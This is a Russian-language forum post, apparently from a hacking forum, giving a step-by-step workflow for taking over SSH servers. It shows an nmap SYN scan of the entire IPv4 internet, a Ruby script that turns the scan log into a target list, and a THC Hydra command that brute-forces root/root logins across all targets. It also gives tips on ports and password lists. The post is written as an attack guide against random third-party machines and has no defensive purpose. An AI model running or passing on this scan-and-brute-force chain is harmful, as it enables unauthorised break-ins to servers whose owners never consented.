nmap + THC Hydra
	
	
	
	
		Код:
	
	
		nmap -sS -p22 --open -oN ~/ssh.nmap_out 0.0.0.0/0
	 
 
-p22 - порт, как можно заметить, перечисление через ','(запятую 22,222,2759 и тд) или диапазоны через '-'(тире 22-220 порты с 22 по 220)
диапозоны не практично для шеллов использовать, т.к. там либо совсем кастомный порт стоит(38593, например) и скорее всего пароль что не подберешь. в твоем случае это будут 22, 222, 2222, 22222, 220, 2200 и тд, основной посыл ясен.
0.0.0.0/0 - весь рейндж ип4. сканить будет долго, так что выбирай какие-то более осмысленные диапозоны для сканирования. можно указывать битовую маску или тире.
-oN ~/ssh.nmap_out - аутпут нормал, обычный лог(как программа в терминал выведет), далее путь сохранения.
-sS - тип сканирования, tcp sync scan. за подробносятми в ман(вообще реккомендую его хотя бы по диагонали пролистать, меньше вопросов будет)
потом лог нужно обработать - составить список целей в формате
ip : port
я использовал маленькую программу на руби для этого :
	
	
	
	
		Код:
	
	
		#/bin/ruby
#format nmap out to ip:port
f = File.open("#{ARGV[0]}", 'r')
out=""
ip=""
f.each_line do |l|
        if l.include? "Nmap scan"
                ip = l.scan(/\d+.\d+.\d+.\d+/).last
        end
        if l.include? " open"
                port=l.split "/"
                out << "#{ip}:#{port[0]}\n"
        end
end
File.open("#{ARGV[0]}.out", 'w').puts out
	 
 
сохранит в туже директорию фаил с таким же именем, на конце будет '.out'
потом гидру запускаешь
	
	
	
	
		Код:
	
	
		hydra -l root -p root -M /path_to_your_targerts_file -o ~/hydra.log ssh
	 
 
будет производить атаку со связкой root/root. можно указать ключи -L и -P для фаилов-списков логинов\паролей.
также стоит посмотреть на количество потоков-задач, за этим загляни в ман по софту 
в целом ничего сложного там нет. но и имо, ничего интересного на на таких шеллах не найдешь, хотя, кто знает. удачи!